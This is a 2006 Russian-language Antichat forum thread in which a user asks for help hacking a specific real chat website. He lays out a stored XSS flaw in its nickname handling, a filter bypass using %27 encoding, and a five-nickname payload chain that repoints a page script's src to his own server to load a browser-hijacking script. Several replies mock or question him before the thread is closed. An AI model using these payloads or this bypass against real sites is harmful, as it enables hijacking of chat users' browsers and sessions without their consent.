Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Помогите доломать чат!!!!!!!!!!!! (https://forum.antichat.xyz/showthread.php?t=17894)

faust45 18.04.2006 21:31
Помогите доломать чат!!!!!!!!!!!!
 
Помогите пожалуйста ломануть чат
http://www.chatinet.zp.ua по полной програме

Я нашёл там одну XSS пробоину Но уж больно
непросто заманить юзера

Вкратце опишу дыру может Кому интерестно будет
Есле залогинетесь под поролем Rendom то после того как вы напишете комуто сообщение в броузере появится такой код
.........<a href="Javascript: parent.send.WritePage('52656E646F6D','Rendom')"><f ont color="#006688"><b>Rendom</b>...............</a>


Ловите фишку ник передаётся как параметр в фунцию всёбы не чего НО всё ето происходит в
hrefe а ето значит что опасные знаки типа ' " можна прописывать в %27 и %22 обходя все фильтры
Теперь введя ник %27,alert(),%27 (%27 значит ')
получим:
....<a href="Javascript: parent.send.WritePage('52656E646F6D','%27,alert(), %27')"><font color="#006688"><b>%27,alert(),%27</b>
...............</a>

И при клике по нашему нику выполнится код между запятыми !!!!!!! УРА!!!!!!!!
Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается


Может поможите ломануть по полной програме
чтоб послал сообщение и всё и чтоб не упрашивать юзера кликать пять раз по карявым никам

Ну очень надо !!!!!!!!!
Зарание блогаларен.

censored! 19.04.2006 00:22
ничерта не понял. то под паролем Рандом логиниться надо, то ник передается.
А Апач зачем?

Регься липовой регистрацией и оставь данные для входа. Народ посмотрит сам.

faust45 19.04.2006 00:48
Под Rendom надо понимать любой ник
А Apach для того чтобы залить свой Script к чатлану ну тоесь у кокого нибудь скрипта
изменить значение атрибута SRC="мой IP"
Я же писал что вся загвоздка состоит в том чтобы заставить юзера последовательно кликнуть на пять вычурных ников Тем самым в его броузере выполнится код в результате у какого нибудь Scripta изменится атрибуд SRC на мой IP !

censored! 19.04.2006 01:46
Все равно не понял.
Ну выйдешь ты за пределы ником типа 123', но толку то? Работает фильтр, длинное обрезается. Как ты путь (scr) скрипту свой прописал? Нафиг Апач?

Антошка2003 19.04.2006 01:50
я тоже так и не пойму о чём автор говорит.

KEZ 19.04.2006 01:53
Автор, лучше бы ты писал больше запятых, чем воскл. знаков.. Прочитать +понять смысл НЕРЕАЛЬНО

По-русски все опиши, особенно вот этот момент:
Цитата:
Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается
...

faust45 19.04.2006 02:56
Ребята ну надоже хоть немного мозгами пораскинуть
ну что вы хотите чтоб я всё разжевал ???

faust45 19.04.2006 03:39
Отвечаю на вопросы censored!

Да фильтр режет ник Но.............
поетому нужно разбить весь код по изменению SRC на пять ников
d=document
s=d.scripts[0]
p="http:\\"
p=p+"my_IP"
s.src=p
User Последовательно кликая по никам выполнит код .
А ники корявые потаму что там полавину символов заминить на %коды надо.
Ну а если ты ешё не понял зачем Apach то мой тебе совет Выпей Яду!

1ten0.0net1 19.04.2006 09:05
Автор гонит не по-детски и, по-моему, не особо шарит по теме - видимо кто-то ему что-то сказал про сайт, а он это со слов записать попытался.

faust45 19.04.2006 10:12
Блин народ ну что ещё не понятного????
Спрашуйте...............

SanyaX 19.04.2006 14:30
Поцан ыт не реально настиигал. Как у тебя Xss работает не помняно =))

Go0o$E 19.04.2006 17:05
Надо статью сделать "Русский язык для хакера". Какие там Xss, Sql и т.д. Русский надо знать сначала. Хотя бы чтобы тебя понимали.

faust45 19.04.2006 20:47
Читайте пожалуйста вдумчиво!!!!!!!!

Заходим под пятью никами:

1) %27,d%3Ddocument,%27
2) %27,s%3Dd.scripts[0],%27 <--! Прошу обратить внемание, mах длина Логина 24 символа всё что после режется фильтром. Вот свезло так свизло Символ в символ -->
3) %27,p%3D"http://",%27
4) %27,p%3Dp+%27my_IP
5) %27,s.src%3Dp,%27 <--! После клика по етому нику Броузер обратится к моему компу на 80 порт по HTTP(чтобы подкачать скрипт) А там Apach висит, а в файле index.html записан Script Захватывающий контроль над броузером -->

%27 значит ' <--! Обход фильтров -->
%3D значит =

Затем упрашиваем Чатлана попорядку кликнуть по никам и ............

Если у когото будет желани проверить Логиньтесь под етими никами только неполитесь и в Главную комнату не суйтесь Пароль на все ники 123
Затем просто наведите мыш на ник и посмотрите в строку состояния броузера.


Ну вроде всё расписал подробно !!!
Ёщё будут вопросы???

faust45 19.04.2006 20:50
Да и помогать до ламывать не надо Забудьте я пошутил.

DRON-ANARCHY 19.04.2006 21:28
Цитата:
Читайте пожалуйста вдумчиво!!!!!!!!

Заходим под пятью никами:
Как ты себе это представляешь? Слушай! сними видео о том, как зайти под пятью никами...

censored! 20.04.2006 00:05
faust45, теоретически понятно как ты хотел сделать, но на практике на том чате я не представляю.
Так чего, тему закрывать?

Антошка2003 20.04.2006 00:07
по видимому, да. не можем мы его допонять полностью.

faust45 20.04.2006 00:31
Слушай censored!
Всё что я написал реально работает я всё ето проделывал лично.
Я просто думал , может на основе етой дыры кто то ломанёт ещё круче .
А никто неможет вьехать даже в расжованый XSS

Да тему закрывай.

DRON-ANARCHY 20.04.2006 19:19
ДА Я ЛАМЕР

bxN5 20.04.2006 20:29
а почему ник у тя фиолетовый?

SanyaX 20.04.2006 20:32
Пацан ты не реально гонишь. Раз автор темы согласился закрыть её. закрывай censored!.

censored! 21.04.2006 00:29
Цитата:
А никто неможет вьехать даже в расжованый XSS
Ну уж извини.

Цитата:
Да тему закрывай
Closed!


Время: 01:12